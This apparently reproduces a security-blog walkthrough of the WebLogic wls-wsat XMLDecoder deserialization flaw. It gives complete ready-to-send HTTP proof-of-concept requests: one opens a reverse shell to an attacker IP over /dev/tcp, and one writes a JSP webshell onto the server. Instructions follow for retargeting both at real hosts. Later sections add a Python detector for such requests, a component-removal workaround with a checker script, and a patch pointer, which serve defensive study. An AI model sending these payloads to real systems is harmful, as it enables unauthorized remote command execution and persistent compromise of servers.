Vulnerability background
WebLogic's WLS Security component exposes a web service that uses XMLDecoder to parse XML data supplied by the user. A deserialization flaw during that parsing allows arbitrary command execution.
Exploitation scenario
Scan the target host's IP with Nmap; port 7001 is found open.
➜ ~ nmap -A 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 09:41 CST
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
open http Oracle WebLogic Server (Servlet 2.5; JSP 2.1)
Error 404--Not Found
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.60 seconds
Open the page served on port 7001 in a browser.
The error page reveals the WebLogic version. Append /console after the port to see whether the WebLogic admin console opens; in real deployments, the developers usually block the admin console.
Also append /wls-wsat after the IP to check whether the responding component exists.
A 403 means the component exists but access to it is restricted; at this point the vulnerability can be judged to exist.
Exploitation method
Capture the request with BurpSuite
Open this page in Firefox and start BurpSuite to capture the request.
Reverse-shell POC:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.211.55.6:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/bash</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>bash -i >& /dev/tcp/192.168.31.240/4444 0>&1</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
Two things to note when using the reverse-shell POC:
1. The Host header IP is the target host's IP. The target used in this demo is 10.211.55.6; in a real penetration test, change the Host IP to match the actual target.
2. The reverse-shell IP is the attacking machine's IP; adjust it to your own address.
After editing the parameters in BurpSuite, right-click the request and send it to the Repeater tab.
Before clicking Send, open a shell window on the attacking machine listening on the attacker IP and port you configured.
Then click Send in BurpSuite. The exploit succeeds and the target host's shell is returned in the listening window.
Webshell-writing POC:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.211.55.6:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
          <void method="println"><string> <![CDATA[<% out.print("Hacked By 攻防SRC"); %> ]]> </string></void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
Change the above POC to the target host's IP in BurpSuite and send it.
Visit the webshell address:
The vulnerability has now been exploited successfully.
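From the defender's side, both requests above share one detectable shape: a text/xml POST to /wls-wsat/ whose SOAP Header carries a work:WorkContext element wrapping a java.beans.XMLDecoder payload. The following Python detector is an added example, not part of the original post; the host name, the harmless /bin/true command, the sample requests and the list of risky classes are all constructed assumptions.

```python
import xml.etree.ElementTree as ET
SOAP = "{http://schemas.xmlsoap.org/soap/envelope/}"
WORKAREA = "{http://bea.com/2004/06/soap/workarea/}"
# Classes typically instantiated by XMLDecoder payloads for this bug (assumed list)
RISKY = {"java.lang.ProcessBuilder", "java.lang.Runtime", "java.io.PrintWriter"}

def split_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    return lines[0], headers, body

def inspect_request(raw):
    """Return findings for one request; an empty list means nothing suspicious."""
    req_line, headers, body = split_request(raw)
    parts = req_line.split()
    if len(parts) < 2 or not parts[1].startswith("/wls-wsat/"):
        return []                        # not the WLS-WebServices endpoint
    if "xml" not in headers.get("content-type", ""):
        return []
    try:
        root = ET.fromstring(body)       # production code should use defusedxml
    except ET.ParseError:
        return ["unparseable XML body sent to /wls-wsat/"]
    header = root.find(SOAP + "Header")
    findings = []
    for ctx in ([] if header is None else header.iter(WORKAREA + "WorkContext")):
        for java in ctx.iter("java"):    # nested <java><java ...> is matched too
            if java.get("class") != "java.beans.XMLDecoder":
                continue
            findings.append("XMLDecoder payload in WorkContext header")
            used = {e.get("class") for e in java.iter()} & RISKY
            findings.extend("instantiates " + c for c in sorted(used))
    return findings

# Constructed samples: a decoder payload running a harmless /bin/true, and a benign call
HDR = ("POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\nHost: weblogic.example:7001\r\n"
       "Content-Type: text/xml\r\n\r\n")
MALICIOUS = HDR + (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
    '<java version="1.4.0" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder">'
    '<array class="java.lang.String" length="1"><void index="0"><string>/bin/true</string>'
    '</void></array><void method="start"/></void></java></work:WorkContext>'
    '</soapenv:Header><soapenv:Body/></soapenv:Envelope>')
BENIGN = HDR + (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header/><soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>')
```

Run inspect_request over captured requests (for example from a reverse proxy log that stores bodies) and alert on any non-empty result.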
Pitfalls encountered
Using nc
It is worth checking how nc is used on each system, since the options differ; typing nc in a shell window prints its usage.
Vulnerability fix
1. Temporary workaround: depending on the business requirements, consider deleting the WLS-WebServices component. The paths containing this component are:
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
Middleware/wlserver_10.3/server/lib/wls-wsat.war
All of these paths are under the WebLogic installation directory. After deleting the files, restart WebLogic and confirm that http://weblogic_ip/wls-wsat/ returns a 404 page.
2. Download the security patch provided on Oracle's official site.
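An added verification script for the workaround above (my own code, not from the post): it lists which of the three wls-wsat artifacts still exist under the Middleware directory and interprets the status of /wls-wsat/ the way the text does (404 means removed, 403 means still present with access restricted). The Middleware root and base URL are parameters you supply; the function names are my own.

```python
import os
import urllib.error
import urllib.request

# The three artifacts the workaround deletes, relative to the Middleware directory
WLS_WSAT_ARTIFACTS = [
    "user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat",
    "user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war",
    "wlserver_10.3/server/lib/wls-wsat.war",
]

def leftover_artifacts(middleware_root):
    """Return the artifact paths that are still present under middleware_root."""
    return [rel for rel in WLS_WSAT_ARTIFACTS
            if os.path.exists(os.path.join(middleware_root, rel))]

def classify_status(code):
    """Interpret the status of /wls-wsat/ as the text above does."""
    if code == 404:
        return "removed"
    if code == 403:
        return "present, access restricted"
    return "present"

def probe_endpoint(base_url, timeout=5):
    """GET base_url/wls-wsat/ (after the restart) and classify the response."""
    url = base_url.rstrip("/") + "/wls-wsat/"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return classify_status(resp.status)
    except urllib.error.HTTPError as err:   # 403 and 404 arrive as exceptions
        return classify_status(err.code)

def verify_workaround(middleware_root, base_url=None):
    """Return (leftover files, endpoint verdict); the probe is skipped without a URL."""
    leftovers = leftover_artifacts(middleware_root)
    verdict = probe_endpoint(base_url) if base_url else "not probed"
    return leftovers, verdict
```

The fix is complete only when the leftover list is empty and the verdict is "removed".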
Going further
While reproducing the vulnerability I came across a WebLogic XMLDecoder deserialization check tool; it can quickly test whether a target host is vulnerable and improves penetration-testing efficiency.
This article is shared from the WeChat public account 攻防SRC (SNNUSRC).